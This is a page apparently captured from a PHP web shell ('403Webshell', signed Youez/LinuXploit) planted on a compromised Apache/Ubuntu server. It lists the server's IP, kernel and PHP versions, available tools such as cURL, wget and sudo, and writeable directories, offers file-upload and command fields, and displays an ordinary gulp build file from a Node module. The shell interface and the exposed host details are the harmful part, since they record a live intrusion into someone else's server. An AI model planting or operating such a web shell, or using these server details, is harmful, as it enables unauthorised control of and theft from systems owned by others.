403Webshell
Server IP : 157.230.181.24  /  Your IP : 216.73.217.11
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux conductive 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64
User :  ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/vhosts/convo/node_modules/argparse/node_modules/underscore.string/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/convo/node_modules/argparse/node_modules/underscore.string/gulpfile.js
var gulp = require('gulp'),
    qunit = require("gulp-qunit"),
    uglify = require('gulp-uglify'),
    clean = require('gulp-clean'),
    rename = require('gulp-rename'),
    SRC = 'lib/underscore.string.js',
    DEST = 'dist',
    MIN_FILE = 'underscore.string.min.js',
    TEST_SUITES = ['test/test.html', 'test/test_underscore/index.html'];

gulp.task('test', function() {
    return gulp.src(TEST_SUITES)
        .pipe(qunit());
});

gulp.task('clean', function() {
    return gulp.src(DEST)
        .pipe(clean());
});

gulp.task('build', ['test', 'clean'], function() {
    return gulp.src(SRC)
        .pipe(uglify())
        .pipe(rename(MIN_FILE))
        .pipe(gulp.dest(DEST));
});

Youez - 2016 - github.com/yon3zu
LinuXploit